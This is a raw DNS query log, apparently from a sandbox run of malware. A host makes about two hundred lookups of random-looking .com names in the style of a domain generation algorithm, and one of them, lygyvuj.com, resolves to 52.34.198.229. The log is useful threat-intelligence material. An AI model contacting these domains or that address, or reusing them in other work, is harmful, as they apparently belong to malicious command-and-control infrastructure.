Aug 23, 2024 18:48:52.720326900 CEST	1.1.1.1	192.168.2.4	0xb3d	Name error (3)	pufymyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.720571995 CEST	1.1.1.1	192.168.2.4	0x9091	Name error (3)	puzylol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.720586061 CEST	1.1.1.1	192.168.2.4	0x76ed	Name error (3)	lyryfox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.721087933 CEST	1.1.1.1	192.168.2.4	0x10a4	Name error (3)	vofymem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.721100092 CEST	1.1.1.1	192.168.2.4	0x8e29	Name error (3)	pumypyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.724041939 CEST	1.1.1.1	192.168.2.4	0x74d3	Name error (3)	vonypyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.725991964 CEST	1.1.1.1	192.168.2.4	0x91bb	Name error (3)	pupyboq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.726006031 CEST	1.1.1.1	192.168.2.4	0x5ed	Name error (3)	gaqycyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.726434946 CEST	1.1.1.1	192.168.2.4	0x6a93	Name error (3)	vojyjyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.726448059 CEST	1.1.1.1	192.168.2.4	0x21f1	Name error (3)	qetyfop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.726458073 CEST	1.1.1.1	192.168.2.4	0xcc74	Name error (3)	lyvytan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.728189945 CEST	1.1.1.1	192.168.2.4	0xac9d	Name error (3)	pumyxep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.728204012 CEST	1.1.1.1	192.168.2.4	0x1d6b	Name error (3)	ganypeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.728213072 CEST	1.1.1.1	192.168.2.4	0xda2	Name error (3)	pujyjup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.728223085 CEST	1.1.1.1	192.168.2.4	0xc3af	Name error (3)	gatyviw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.728233099 CEST	1.1.1.1	192.168.2.4	0xc489	Name error (3)	lymyxex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.728243113 CEST	1.1.1.1	192.168.2.4	0xead7	Name error (3)	lyryvur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.728251934 CEST	1.1.1.1	192.168.2.4	0xa910	Name error (3)	vopybok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.728262901 CEST	1.1.1.1	192.168.2.4	0x67e8	Name error (3)	lyxywij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.728271961 CEST	1.1.1.1	192.168.2.4	0x5f27	Name error (3)	qedynaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.729923010 CEST	1.1.1.1	192.168.2.4	0x7c4	Name error (3)	qexyriq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.852119923 CEST	1.1.1.1	192.168.2.4	0x429b	Name error (3)	gadyneh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.852683067 CEST	1.1.1.1	192.168.2.4	0x8474	Name error (3)	purycul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:52.853858948 CEST	1.1.1.1	192.168.2.4	0xf3b8	Name error (3)	qekykup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.250099897 CEST	1.1.1.1	192.168.2.4	0xae0d	Name error (3)	ganyzas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.250421047 CEST	1.1.1.1	192.168.2.4	0x6190	Name error (3)	qekyqyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.252882957 CEST	1.1.1.1	192.168.2.4	0x8c0f	Name error (3)	lyrysyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.253007889 CEST	1.1.1.1	192.168.2.4	0xf7be	Name error (3)	qetysuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.253098011 CEST	1.1.1.1	192.168.2.4	0xd1ac	Name error (3)	vojymet.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.253269911 CEST	1.1.1.1	192.168.2.4	0xe7e2	Name error (3)	vocykif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.253282070 CEST	1.1.1.1	192.168.2.4	0xa975	Name error (3)	qexykug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.253360987 CEST	1.1.1.1	192.168.2.4	0x79a0	Name error (3)	gahynaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.253372908 CEST	1.1.1.1	192.168.2.4	0xdf4c	Name error (3)	purypyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.253382921 CEST	1.1.1.1	192.168.2.4	0x2077	Name error (3)	qegynap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.253735065 CEST	1.1.1.1	192.168.2.4	0x6bf2	Name error (3)	vopycyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.253830910 CEST	1.1.1.1	192.168.2.4	0xfc6a	Name error (3)	puvyliv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.254229069 CEST	1.1.1.1	192.168.2.4	0x5821	Name error (3)	qekyheq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.254307985 CEST	1.1.1.1	192.168.2.4	0xb709	Name error (3)	puzyjyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.254318953 CEST	1.1.1.1	192.168.2.4	0x1db0	Name error (3)	lykygaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.254405975 CEST	1.1.1.1	192.168.2.4	0x7000	Name error (3)	lyxyjun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.254415989 CEST	1.1.1.1	192.168.2.4	0x6fd3	Name error (3)	qetyxeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.254426956 CEST	1.1.1.1	192.168.2.4	0x889e	Name error (3)	gadyvis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.254437923 CEST	1.1.1.1	192.168.2.4	0x54b2	Name error (3)	qedyvuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.254456997 CEST	1.1.1.1	192.168.2.4	0x99df	Name error (3)	qeqytal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.254475117 CEST	1.1.1.1	192.168.2.4	0xf593	Name error (3)	gaqypew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.254909992 CEST	1.1.1.1	192.168.2.4	0x3756	Name error (3)	vocyquc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.255043030 CEST	1.1.1.1	192.168.2.4	0x18a9	Name error (3)	qegyfil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.255418062 CEST	1.1.1.1	192.168.2.4	0x5d	Name error (3)	vofydut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.255429029 CEST	1.1.1.1	192.168.2.4	0xcc6f	Name error (3)	lyryxen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.255439997 CEST	1.1.1.1	192.168.2.4	0x43d2	Name error (3)	vonyrot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.255914927 CEST	1.1.1.1	192.168.2.4	0x9a0	Name error (3)	pufybop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.256017923 CEST	1.1.1.1	192.168.2.4	0x80d3	Name error (3)	vofybic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.256027937 CEST	1.1.1.1	192.168.2.4	0x6894	Name error (3)	puzymev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.256778002 CEST	1.1.1.1	192.168.2.4	0x255e	Name error (3)	volyjym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.256870031 CEST	1.1.1.1	192.168.2.4	0xc9f7	Name error (3)	lygyfir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.256880999 CEST	1.1.1.1	192.168.2.4	0xd9b9	Name error (3)	lymylij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.257680893 CEST	1.1.1.1	192.168.2.4	0x9174	Name error (3)	qexyqyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.257693052 CEST	1.1.1.1	192.168.2.4	0xfaf8	Name error (3)	puryxag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.257703066 CEST	1.1.1.1	192.168.2.4	0x87cd	Name error (3)	pujymel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.259491920 CEST	1.1.1.1	192.168.2.4	0xb42c	Name error (3)	gaqyzoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.261677027 CEST	1.1.1.1	192.168.2.4	0xb783	Name error (3)	lygynox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.265348911 CEST	1.1.1.1	192.168.2.4	0x1f4f	Name error (3)	gatycyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.276140928 CEST	1.1.1.1	192.168.2.4	0x6d59	Name error (3)	lykymyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.277520895 CEST	1.1.1.1	192.168.2.4	0x96a1	Name error (3)	pupydig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.277533054 CEST	1.1.1.1	192.168.2.4	0x6b6d	Name error (3)	lyvylod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.279491901 CEST	1.1.1.1	192.168.2.4	0x42a4	Name error (3)	gatyduh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.279512882 CEST	1.1.1.1	192.168.2.4	0x966d	Name error (3)	gacykub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.279522896 CEST	1.1.1.1	192.168.2.4	0x4174	Name error (3)	pupycuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.279532909 CEST	1.1.1.1	192.168.2.4	0x42f3	Name error (3)	lysyvud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.280639887 CEST	1.1.1.1	192.168.2.4	0xfaa6	Name error (3)	puvywup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.280652046 CEST	1.1.1.1	192.168.2.4	0x592d	Name error (3)	galyheh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.280661106 CEST	1.1.1.1	192.168.2.4	0x62c	Name error (3)	pujygaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.280670881 CEST	1.1.1.1	192.168.2.4	0x634	Name error (3)	qebyrip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.280679941 CEST	1.1.1.1	192.168.2.4	0xc49	Name error (3)	vojygok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.280690908 CEST	1.1.1.1	192.168.2.4	0x431f	Name error (3)	lymytar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.280699968 CEST	1.1.1.1	192.168.2.4	0x450e	Name error (3)	gacyqys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.280709982 CEST	1.1.1.1	192.168.2.4	0xd2c7	Name error (3)	gadyduz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.280719995 CEST	1.1.1.1	192.168.2.4	0x5fcb	Name error (3)	vowypek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.283520937 CEST	1.1.1.1	192.168.2.4	0x833f	Name error (3)	pufydul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.283538103 CEST	1.1.1.1	192.168.2.4	0xfd66	Name error (3)	vowyzam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.283548117 CEST	1.1.1.1	192.168.2.4	0xe920	Name error (3)	lyxymed.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.283557892 CEST	1.1.1.1	192.168.2.4	0xa77a	Name error (3)	ganyriz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.283672094 CEST	1.1.1.1	192.168.2.4	0xe33c	Name error (3)	pumytol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.283683062 CEST	1.1.1.1	192.168.2.4	0xf0a2	Name error (3)	gahyfow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.287069082 CEST	1.1.1.1	192.168.2.4	0x9658	Name error (3)	qeqyloq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.401084900 CEST	1.1.1.1	192.168.2.4	0xea6b	Name error (3)	vopydum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.405023098 CEST	1.1.1.1	192.168.2.4	0xcfb9	Name error (3)	qebylov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.771593094 CEST	1.1.1.1	192.168.2.4	0x858	Name error (3)	vopypec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.772578955 CEST	1.1.1.1	192.168.2.4	0x1976	Name error (3)	galynab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.772932053 CEST	1.1.1.1	192.168.2.4	0xa213	Name error (3)	ganykuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.773076057 CEST	1.1.1.1	192.168.2.4	0x838	Name error (3)	qebykul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.773116112 CEST	1.1.1.1	192.168.2.4	0xb7c5	Name error (3)	gatypas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.773128033 CEST	1.1.1.1	192.168.2.4	0x60d3	Name error (3)	lykynon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.775266886 CEST	1.1.1.1	192.168.2.4	0x9c79	Name error (3)	puvyjyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.775693893 CEST	1.1.1.1	192.168.2.4	0xa65a	Name error (3)	vojybim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.775705099 CEST	1.1.1.1	192.168.2.4	0x3553	Name error (3)	qedysyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.775758982 CEST	1.1.1.1	192.168.2.4	0x71f8	Name error (3)	qetytav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.775892973 CEST	1.1.1.1	192.168.2.4	0x9a6a	Name error (3)	vocyjet.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.777277946 CEST	1.1.1.1	192.168.2.4	0xde9d	Name error (3)	purytov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.778017998 CEST	1.1.1.1	192.168.2.4	0x6532	Name error (3)	gacyhez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.778270006 CEST	1.1.1.1	192.168.2.4	0xde0b	Name error (3)	gahyvuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.778422117 CEST	1.1.1.1	192.168.2.4	0x4124	Name error (3)	qegyvuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.778681040 CEST	1.1.1.1	192.168.2.4	0x41e7	Name error (3)	vowyrif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.779480934 CEST	1.1.1.1	192.168.2.4	0xef3d	Name error (3)	puzygop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.780292988 CEST	1.1.1.1	192.168.2.4	0xf3f	Name error (3)	lyxygax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.780782938 CEST	1.1.1.1	192.168.2.4	0xccd8	Name error (3)	vofycyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.781212091 CEST	1.1.1.1	192.168.2.4	0xd2d8	Name error (3)	pufycyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.781416893 CEST	1.1.1.1	192.168.2.4	0xd581	Name error (3)	volygoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.781620026 CEST	1.1.1.1	192.168.2.4	0xead4	Name error (3)	lymywun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.782859087 CEST	1.1.1.1	192.168.2.4	0x2cf1	Name error (3)	galyfis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.784163952 CEST	1.1.1.1	192.168.2.4	0x885b	Name error (3)	pumywug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.784600973 CEST	1.1.1.1	192.168.2.4	0x5c24	Name error (3)	qekyfiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.785088062 CEST	1.1.1.1	192.168.2.4	0x5d48	Name error (3)	lykyfud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.785381079 CEST	1.1.1.1	192.168.2.4	0x54f0	Name error (3)	ganyqyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.785396099 CEST	1.1.1.1	192.168.2.4	0x5e5d	Name error (3)	gaqyrib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.790179968 CEST	1.1.1.1	192.168.2.4	0xf098	Name error (3)	pumyliq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.790568113 CEST	1.1.1.1	192.168.2.4	0x7483	Name error (3)	lysysyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.792018890 CEST	1.1.1.1	192.168.2.4	0xfb51	Name error (3)	volymaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.793123007 CEST	1.1.1.1	192.168.2.4	0xb95	Name error (3)	pupypep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.794126987 CEST	1.1.1.1	192.168.2.4	0x893	Name error (3)	pujybig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.794960022 CEST	1.1.1.1	192.168.2.4	0x833c	Name error (3)	qebyqeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.795774937 CEST	1.1.1.1	192.168.2.4	0xf3f3	Name error (3)	vonykuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.802778959 CEST	1.1.1.1	192.168.2.4	0x218e	Name error (3)	qetylip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.802820921 CEST	1.1.1.1	192.168.2.4	0xfd1	Name error (3)	gatyzoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.802833080 CEST	1.1.1.1	192.168.2.4	0x6d2a	Name error (3)	lyrytod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.807554007 CEST	1.1.1.1	192.168.2.4	0x2321	Name error (3)	gahydyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.810086966 CEST	1.1.1.1	192.168.2.4	0x6a94	Name error (3)	qegysyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.810199976 CEST	1.1.1.1	192.168.2.4	0xc74a	Name error (3)	puvymaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.810210943 CEST	1.1.1.1	192.168.2.4	0xa901	Name error (3)	lygysen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.810410023 CEST	1.1.1.1	192.168.2.4	0xa0e	Name error (3)	pufypeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.810420990 CEST	1.1.1.1	192.168.2.4	0x5807	Name error (3)	qexyhap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.810431957 CEST	1.1.1.1	192.168.2.4	0xc586	Name error (3)	purylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.811701059 CEST	1.1.1.1	192.168.2.4	0xb359	Name error (3)	lyvyjyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.813455105 CEST	1.1.1.1	192.168.2.4	0x1ef5	Name error (3)	qedyxel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.815648079 CEST	1.1.1.1	192.168.2.4	0x4b8c	Name error (3)	vonyqym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.818249941 CEST	1.1.1.1	192.168.2.4	0x815	Name error (3)	lysyxar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.831197023 CEST	1.1.1.1	192.168.2.4	0xfa5a	Name error (3)	pujyduv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.831792116 CEST	1.1.1.1	192.168.2.4	0xa945	Name error (3)	vojyduf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.831801891 CEST	1.1.1.1	192.168.2.4	0xaf12	Name error (3)	lyrylix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.833870888 CEST	1.1.1.1	192.168.2.4	0xa000	Name error (3)	lyvymej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.833880901 CEST	1.1.1.1	192.168.2.4	0x785f	Name error (3)	vocymak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.833889961 CEST	1.1.1.1	192.168.2.4	0x1012	Name error (3)	gacynow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.834407091 CEST	1.1.1.1	192.168.2.4	0x608d	Name error (3)	vowykuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.836999893 CEST	1.1.1.1	192.168.2.4	0x59c8	Name error (3)	gaqykus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.837011099 CEST	1.1.1.1	192.168.2.4	0x969	Name error (3)	qexynol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.927089930 CEST	1.1.1.1	192.168.2.4	0xe243	Name error (3)	qekynog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.928035975 CEST	1.1.1.1	192.168.2.4	0x2fc3	Name error (3)	qeqyrug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.929987907 CEST	1.1.1.1	192.168.2.4	0xfea4	Name error (3)	gadycew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.938546896 CEST	1.1.1.1	192.168.2.4	0x6419	Name error (3)	pupyxal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.939928055 CEST	1.1.1.1	192.168.2.4	0xf54f	Name error (3)	vopyzot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:53.987970114 CEST	1.1.1.1	192.168.2.4	0xcbec	No error (0)	lygyvuj.com		52.34.198.229	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:54.209496021 CEST	1.1.1.1	192.168.2.4	0x31c1	No error (0)	lygyvuj.com		52.34.198.229	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.189369917 CEST	1.1.1.1	192.168.2.4	0x98fd	Name error (3)	qeqykyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.190442085 CEST	1.1.1.1	192.168.2.4	0xe7fc	Name error (3)	puzybil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.200529099 CEST	1.1.1.1	192.168.2.4	0x9fb2	Name error (3)	lyxynir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.202891111 CEST	1.1.1.1	192.168.2.4	0x5f44	Name error (3)	volybut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.203880072 CEST	1.1.1.1	192.168.2.4	0xbd84	Name error (3)	gadypah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.204180002 CEST	1.1.1.1	192.168.2.4	0x737a	Name error (3)	galyvuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.205034971 CEST	1.1.1.1	192.168.2.4	0x59d4	Name error (3)	qedytoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.206444979 CEST	1.1.1.1	192.168.2.4	0xf51f	Name error (3)	lysytoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.208493948 CEST	1.1.1.1	192.168.2.4	0x9e42	Name error (3)	lykyvyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.208842993 CEST	1.1.1.1	192.168.2.4	0x3e3f	Name error (3)	qebyhag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.208853960 CEST	1.1.1.1	192.168.2.4	0xd81e	Name error (3)	vonyjef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.208864927 CEST	1.1.1.1	192.168.2.4	0x722a	Name error (3)	pumyjev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.209151030 CEST	1.1.1.1	192.168.2.4	0x2169	Name error (3)	pupytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.209672928 CEST	1.1.1.1	192.168.2.4	0x6f34	Name error (3)	gatyruw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.210199118 CEST	1.1.1.1	192.168.2.4	0xd26c	Name error (3)	vojycec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.210685015 CEST	1.1.1.1	192.168.2.4	0xdf2b	Name error (3)	lyvygon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.211252928 CEST	1.1.1.1	192.168.2.4	0xb967	Name error (3)	pujycyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.211730003 CEST	1.1.1.1	192.168.2.4	0x1fd5	Name error (3)	qetyrul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.212027073 CEST	1.1.1.1	192.168.2.4	0x1e74	Name error (3)	vopyrik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.222237110 CEST	1.1.1.1	192.168.2.4	0x374f	Name error (3)	vocygim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.222925901 CEST	1.1.1.1	192.168.2.4	0x8c4d	Name error (3)	lymyjyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.222981930 CEST	1.1.1.1	192.168.2.4	0xab05	Name error (3)	purywyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.222991943 CEST	1.1.1.1	192.168.2.4	0x4f76	Name error (3)	vowyqyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.223526001 CEST	1.1.1.1	192.168.2.4	0xd00	Name error (3)	lyxyfuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.225121021 CEST	1.1.1.1	192.168.2.4	0x4321	Name error (3)	pufyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.229754925 CEST	1.1.1.1	192.168.2.4	0xbbe	Name error (3)	ganyhab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.231565952 CEST	1.1.1.1	192.168.2.4	0x283e	Name error (3)	gadyzib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.231724024 CEST	1.1.1.1	192.168.2.4	0xb234	Name error (3)	puvygog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.232615948 CEST	1.1.1.1	192.168.2.4	0xc2b0	Name error (3)	lymymax.com	none	none	A (IP address)	IN (0x0001)	false
